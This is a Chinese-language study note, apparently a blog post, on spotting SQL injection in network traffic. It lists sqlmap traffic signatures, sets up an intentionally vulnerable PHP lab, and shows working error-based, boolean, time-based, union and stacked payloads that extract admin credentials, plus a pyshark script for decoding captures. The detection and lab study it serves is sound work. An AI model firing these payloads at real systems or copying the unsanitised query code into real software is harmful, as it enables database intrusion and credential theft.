免責聲明：本文僅作分享 ~?

目錄

SQL注入流量分析

特征：

sqlmap注入類型

漏洞環境搭建

error_sql:

bool_sql:

time_sql:

union_sql:

Stacked Queries:

Inline Queries:

---

?

SQL注入流量分析

https://www.freebuf.com/column/161797.html

SQLMAP攻擊流量特征分析_sqlmap流量特征-CSDN博客

---

特征：

1-sqlmap UA   （流量中的headers）2-出現一些特殊字符（非法字符）
{eg：單引號--'、雙引號--""、括號--()、單引號括號--'(、雙引號括號--"(等一些常見的特殊的字符}；
# --  注釋符3-出現SQL命令/語句
（增加、刪除、修改、查詢語句或者各語句之間的串接）
萬能密碼  and   or		'or'1'='14-出現常見的特殊函數
sql，  sleep 5-編碼   url ，base64 ，6-參數長度異常，非法字符，異常請求，錯誤響應，非常規流量

1、出現一些特殊字符{eg：單引號--'、雙引號--""、括號--()、單引號括號--'(、雙引號括號--"(等一些常見的特殊的字符}；eg：http://localhost/index.php/?id=1'and+1=1--+
eg：http://localhost/index.php/?id=1 and 1=1 -- -和1 and 1=2 --+2、出現SQL命令/語句（增加、刪除、修改、查詢語句或者各語句之間的串接）eg：url/?id=1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) -- -
eg：url/?id=-1' union select 1,group_concat(schema_name),3 from  information_schemaschemata --+3、出現注釋符號（在語句的最后出現連續2個減號字元 -- 后的    文字為注解，或“/*”與“*/”所包起來的文字為注解）4、在url上出現萬能密碼字段  'or'1'='15、出現常見的特殊函數database()、updatexml()、extractvalue()、group_concat()、concat()、limit()、order by()、unsion()、system_user()、version()、load_file()、seelp()、length()、exp()、group by()、substr()、and、or等函數。eg：?id=1” and updatexml(1,concat(0x7e,database()),3) --+
eg：?id=-1’ union select 1,2,seelp(5)--+
eg：1” union select updatexml(1,concat(0x7e,(select     group_concat(username) from users)),1) #6、出現各種編碼（eg：url編碼，base64編碼等）可利用Burp或 者在線解/編碼器進行操作查看是否有特殊字段。7、user-agent字段出現sqlmap/1.*.*.*#dev (http://sqlmap.org)

sqlmap注入類型

B Boolean-based blind，基于bool的盲注

E Error-based，基于報錯的注入

U Union query-based，聯合查詢注入

S Stacked queries，堆疊查詢注入

T Time-based blind，基于時間的盲注

Q Inline queries，內聯查詢注入，

---

漏洞環境搭建

phpstudy?

xxx.php??

<?php
// 連接到MySQL數據庫
$conn = new mysqli("localhost", "root", "password", "test_db");// 檢查連接
if ($conn->connect_error) {die("連接失敗: " . $conn->connect_error);
}// 獲取用戶輸入
$id = $_GET['id'];// 構造SQL查詢
$sql = "SELECT * FROM users WHERE id = $id";// 執行查詢
$result = $conn->query($sql);if ($result->num_rows > 0) {// 輸出數據while($row = $result->fetch_assoc()) {echo "id: " . $row["id"]. " - Name: " . $row["name"]. " - Email: " . $row["email"]. "<br>";}
} else {echo "0 結果";
}$conn->close();
?>

xxx.html?

<!DOCTYPE html>
<html lang="zh-CN">
<head><meta charset="UTF-8"><title>SQL</title>
</head>
<body><h1>SQL注入測試</h1><form action="error_based_injection.php" method="GET"><label for="id">用戶ID:</label><input type="text" id="id" name="id" placeholder="輸入用戶ID"><button type="submit">提交</button></form>
</body>
</html>

---

error_sql:

1.8#stable

xxx or sqlxxx

基于錯誤 ,報錯？--》引發sql語法報錯。

利用數據庫返回的錯誤信息來獲取數據庫結構或數據。

1 OR 1=1

特征：

響應長度，報錯查詢

每次只出一條數據.(一條一條出)
固定的錯誤長度 （例543 ， 596，323）
(通過報錯帶出數據)
xxx or sqlxxx 	 無論如何，使條件為真，執行后門的sql語句。

id=1 OR (SELECT 9674 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT (ELT(9674=9674,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/error_based_injection.php?id=1 OR (SELECT 9694 FROM(SELECT COUNT(*),CONCAT(0x717a7a6a71,(SELECT MID((IFNULL(CAST(id AS NCHAR),0x20)),1,54) FROM sql_ll.`admin` ORDER BY id LIMIT 2,1),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/error_based_injection.php?id=1 OR (SELECT 1967 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT MID((IFNULL(CAST(password AS NCHAR),0x20)),1,54) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

---

bool_sql:

%3E >

%2C ,

1 AND SUBSTRING((SELECT password FROM admin WHERE id=1), 1, 1) = 'a'

 id=1 AND 4823=4823單個字符出(單個單個出) ，通過返回的長度判斷。
單個字符出流量非常龐大id=1 AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>1

看執行的sql語句 + 響應長度?，判斷是否

/error_based_injection.php?id=1 AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),1,1))>64正常請求323 ---》 0 結果
TRUE: 有結果
False： 0 結果
（  >102不對，  >101對,   --》 102 == f）

http && frame.len>323

---

time_sql:

1 AND IF(SUBSTRING((SELECT password FROM admin WHERE id=1), 1, 1) = 'a', SLEEP(5), 0)

看響應時間，判斷是否

/error_based_injection.php?id=1 AND (SELECT 7090 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(password AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),16,1))>112,0,2)))))hUpu)sleep 2
單個字符出（正確的時間為2s，不正確<2s)  ，通過sleep判斷。
請求時間 

>102

>1 !=103 >96 >48 >103

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))>104,0,2)))))LXmR)

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))>102,0,2)))))LXmR) 2s

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))>103,0,2)))))LXmR)

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),4,1))!=103,0,2)))))LXmR)

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>96,0,2)))))LXmR)

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>48,0,2)))))LXmR)

id=1 AND (SELECT 8430 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sql_ll.`admin` ORDER BY id LIMIT 3,1),5,1))>1,0,2)))))LXmR)

import pyshark
from urllib.parse import unquote
import re
paks = pyshark.FileCapture(r"C:\Users\26255\Desktop\time_sql.pcapng", tshark_path=r"E:\wireshark\tshark.exe", display_filter='http.response && http.request.full_uri contains "id=1%20"')
s = ''
for pak in paks:# 使用 getattr 安全訪問屬性request_uri = getattr(pak.http, 'request_uri', None)request_time = getattr(pak.http,'time',None)if request_uri:# print(unquote(request_uri))# print(request_time)try:urlde_uri = unquote(request_uri)# pattern = r"(!=|>)\s*(\d+)"# mat = re.findall(pattern,urlde_uri)# s += str(mat) + '\n' + request_time + '\n's += urlde_uri + '\n' + request_time + '\n'# breakfinally:passelse:print("No request URI found in this packet")
print(s)
with open(r"C:\Users\26255\Desktop\1.txt",'w')as f:f.write(s)

---

union_sql:

id=1 UNION ALL SELECT NULL,CONCAT(0x71786b6a71,0x6f48516a4d5573666e654c6559775242444467706f766f7a6e70726b71575650426f5a7858764a64,0x716b626a71),NULL-- -

響應長度 比正常大一些。

聯合查詢
執行多條sql查詢語句  select 	UNION  select

---

Stacked Queries:

sqlxxx ; sqlxxx

Stacked Queries（堆疊注入）-CSDN博客

單個字符單個字符出,通過sleep判斷。
時間請求 sleep 
;

看響應時間。

/stacked_injection.php?id=2;SELECT IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>114),SLEEP(1),1881)# 1s

/stacked_injection.php?id=2;SELECT IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))>115),SLEEP(1),1881)#

/stacked_injection.php?id=2;SELECT IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),3,1))!=115),SLEEP(1),1881)#

堆疊注入的? ?xxx.php :

<?php
// 連接到MySQL數據庫
$conn = new mysqli("localhost", "root", "root", "sql_ll");// 檢查連接
if ($conn->connect_error) {die("連接失敗: " . $conn->connect_error);
}// 獲取用戶輸入
$id = $_GET['id'];// 構造SQL查詢
$sql = "SELECT * FROM users WHERE id = $id";// 執行查詢
if ($conn->multi_query($sql)) {do {if ($result = $conn->store_result()) {while ($row = $result->fetch_assoc()) {echo "Name: " . $row["name"]. " - Email: " . $row["email"]. "<br>";}$result->free();}} while ($conn->next_result());
} else {echo "查詢失敗: " . $conn->error;
}$conn->close();
?>
--------------------<!DOCTYPE html>
<html lang="zh-CN">
<head><meta charset="UTF-8"><title>堆疊查詢注入測試</title>
</head>
<body><h1>堆疊查詢注入測試</h1><form action="stacked_injection.php" method="GET"><label for="id">用戶ID:</label><input type="text" id="id" name="id" placeholder="輸入用戶ID"><button type="submit">提交</button></form>
</body>
</html>

---

Inline Queries:

（內聯查詢）

拼接,語句分隔,

多語句執行

---